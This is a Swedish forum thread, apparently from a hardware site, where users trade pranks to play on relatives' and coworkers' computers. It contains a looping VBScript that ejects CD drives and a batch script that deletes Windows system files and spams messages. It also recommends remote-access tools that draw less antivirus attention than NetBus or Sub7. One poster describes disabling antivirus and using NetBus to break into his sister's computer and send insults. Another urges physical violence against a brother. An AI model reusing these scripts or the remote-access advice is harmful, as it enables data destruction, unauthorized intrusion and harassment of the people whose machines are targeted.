Permalänk
Medlem
Citat:

Ursprungligen inskrivet av geeken
OT: Snyft.. Tonasty4u avstängd

OnT: En sak som är kul är att plocka bort dvi-sladden (om han har tft-skärm) och gömma den. Det kan reta gallfeber på folk, tro mig

Och det skulle inte gå att plocka bort VGA-sladden på en vanlig skärm och gömma den?

Visa signatur

Du skall icke stjäla, staten gillar inte konkurrens.

Permalänk
Medlem

Dom brukar väl sitta fast i skärmen?

En idé är att koppla in en extra (helst trådlös) mus till datorn och tejpa fast den under eventuell kontorsstol. På så vis flyger muspekaren runt varje gång man flyttar stolen.

Eller så kan man montera den den på ett hamsterhjul.

Visa signatur

4670K@4.4, GTX760-DC2OC-2GD5, Z87I-PRO, 8GB RAM (CML8GX3M2A1600C9), Seasonic G-550 550W

Permalänk
Medlem

Juste ja, de gör de... Längesen man annvände en sådan skärm, har tft och annvänder nu VGA sladd, och tänkte att den går ju också ta bort...

Visa signatur

Du skall icke stjäla, staten gillar inte konkurrens.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Power

Edit: En 87 byte mindre variant av cd popern

Set oWMP = CreateObject("WMPlayer.OCX.7" ) Set colCDROMs = oWMP.cdromCollection While(True) Randomize colCDROMs.Item(Int(colCDROMs.count * Rnd())).Eject Wend

Är det möjligt att göra så den öppnar cdläsaren 2 sekunder efter man stänger den, alltså en 2 sekunders intervall?

Permalänk
Medlem

HAHA testat en massa bus nu han blev ganska sur...

Visa signatur

CHASSI - BeQuiet Dark Base 900 Pro - CPU - Delidded Intel i7 8700K OC 5000Mhz @ 1,375V LLC 6 - MOBO - ASUS Z370 ROG Strix E-Gaming - GPU - EVGA RTX 3070 - RAM - 16GB G.Skill DDR4 3000Mhz - PSU - Seasonic 750W 80+ GOLD - AIO - NZXT Kraken X62 280mm - SSD - 1TB + 500GB Samsung 970 EVO Plus - MONITOR 25" ASUS ROG Swift PG258Q 1080p 1ms 240Hz - CHAIR - Maxnomic Chief Pro TBE - MISC - Corsair K70 LUX - Steelseries QcK Heavy - BENQ Zowie EC2-B - Sennheiser GAME ONE

Permalänk
Medlem

start telnet
start dir
start messager
start netstat
start C:\
del C:\WINDOWS\system32\calc.exe /y
del c:\WINDOWS\system32\notepad.exe /y
:1
echo "OWN3D"
net send 127.0.0.1 "OWN3D BYE!"
goto 1

Visa signatur

Stationär: Ubuntu GB DQ6 P35 | Q6600 | 4GB ram Corsair 2*2gb 800mhz (3.5gb) |1tb SATA + 500gb SATA + 250gb SATA | Sparkle 9800gt Passiv
Laptop: Lenovo 3000 v200 | Ubuntu |

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av ToTe
Är det möjligt att göra så den öppnar cdläsaren 2 sekunder efter man stänger den, alltså en 2 sekunders intervall?

Är inte säker att det går på ett bra sätt men jag ska kolla

Visa signatur

"Sleep is one of those funny things about being a human being" - Marshall Brain
"Mike broke the hubble, Mike broke the hubble" - Mystery Science Theater 3000
"Det finns inget som kan kallas skrot!" säger Mulle Meck, "bara gamla saker som går att använda på nya sätt. Rulla ut och rulla på."

Permalänk
Medlem

i stället för netbus, sub7 osv som hittas direkt av antivirus program kan man köra med Remote Administrator exempelvis. Även det hittas men tjatar inte om filen varje gång man går in i en mapp. Går att styra datorn då helt och hållet

Permalänk
Medlem

trådlös mus är ganska trevligt.

vet inte hur det är riktigt men vissa går väl att köra genom väggar och dyl. så när du märker att han är så mycket bättre än dig i valfritt spel.(om ni kör mot varandra) så tar du upp musen ur din skrivbordslåda och drar den lite fram och tillbaka med jämna mellanrum

Visa signatur

"Din bakgård är en kyrkogård och du har ett mini-auswitch i källaren? Nä precis, fast i kyrkan hittas detta." -Hipshot

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Weestman
HAHA testat en massa bus nu han blev ganska sur...

Berätta mer...
Funderar på att busa en del med mina kollegor. Tyvärr har vi bärbara datorer, så våra dvd-läsare kan knappast stängas av mjukvara. Men öppnas...

Visa signatur
Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Dred
Berätta mer...
Funderar på att busa en del med mina kollegor. Tyvärr har vi bärbara datorer, så våra dvd-läsare kan knappast stängas av mjukvara. Men öppnas...

Bara bättre ju!
Då den öppnas måste de hela tiden manuellt stänga den hela tiden. Jobbigt värre...

Visa signatur

Du skall icke stjäla, staten gillar inte konkurrens.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Tonasty4u
ska du jävlas med brorsan? ge han en ordentlig pungspark och en rak höger, kissa sedan i hans säng. då har du jävlats med han!

gah hahahahaha

Visa signatur

They invented "SUV" because they can't call them Jeep
"Tycker alltid att du är lite tjurskallig när du skriver till mig och andra.. har jag fel?" - tcntad
"Du är fan min idol på Sweclockers Martiis. Tack för att du finns!" -
Crippa90

Permalänk
Medlem

haha har hållt på lite, va sur på syrran o knäckte mig in i hennes dator med NetBus (va tvungen att avaktivera Anti-Viruset) och sen skrev hon till sin polare så skrev jag massa fula ord till henne.. haha. Sen stängde jag av brossans dator så han va tvungen vänta i kö i 30 minuter för att komma in på WoW-Servern..

Mer BUS !

Visa signatur

CHASSI - BeQuiet Dark Base 900 Pro - CPU - Delidded Intel i7 8700K OC 5000Mhz @ 1,375V LLC 6 - MOBO - ASUS Z370 ROG Strix E-Gaming - GPU - EVGA RTX 3070 - RAM - 16GB G.Skill DDR4 3000Mhz - PSU - Seasonic 750W 80+ GOLD - AIO - NZXT Kraken X62 280mm - SSD - 1TB + 500GB Samsung 970 EVO Plus - MONITOR 25" ASUS ROG Swift PG258Q 1080p 1ms 240Hz - CHAIR - Maxnomic Chief Pro TBE - MISC - Corsair K70 LUX - Steelseries QcK Heavy - BENQ Zowie EC2-B - Sennheiser GAME ONE

Permalänk
Medlem

if(Weestman==vuxen)
{
mogna();

}

else if(Weestman==barn)
{

GROW_UP();

}

Väx upp för fan

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Garnax
if(Weestman==vuxen)
{
mogna();

}

else if(Weestman==barn)
{

GROW_UP();

}

Väx upp för fan

if(garnax == VUXEN) garnax.mogna(); else if(garnax == BARN) garnax.growUp();

Visa signatur

I just love the fact that there is a global integer variable named 'i'. Just think, you will never need to declare your loop variable again!
To avoid collisions where a loop that uses 'i' calls another function that loops with 'i', be sure to stack 'i' and restore it when your function exits.

Permalänk
Medlem

if(Myris == Mogen)
{
Alla andra är sämst() ;
}
else
{
Låt barnen ha roligt() ;
}
echo "Muhahaha";

Permalänk
Medlem

Nördhumor när den är som värst...

Permalänk
Medlem

Japp.. och kul är det

Permalänk
Citat:

Ursprungligen inskrivet av Tjodd
Nördhumor när den är som värst...

Citat:

Ursprungligen inskrivet av geeken
Japp.. och kul är det

Det är det som är det värsta.

Permalänk
Medlem

hehee mera ? tack för alla svar

Visa signatur

CHASSI - BeQuiet Dark Base 900 Pro - CPU - Delidded Intel i7 8700K OC 5000Mhz @ 1,375V LLC 6 - MOBO - ASUS Z370 ROG Strix E-Gaming - GPU - EVGA RTX 3070 - RAM - 16GB G.Skill DDR4 3000Mhz - PSU - Seasonic 750W 80+ GOLD - AIO - NZXT Kraken X62 280mm - SSD - 1TB + 500GB Samsung 970 EVO Plus - MONITOR 25" ASUS ROG Swift PG258Q 1080p 1ms 240Hz - CHAIR - Maxnomic Chief Pro TBE - MISC - Corsair K70 LUX - Steelseries QcK Heavy - BENQ Zowie EC2-B - Sennheiser GAME ONE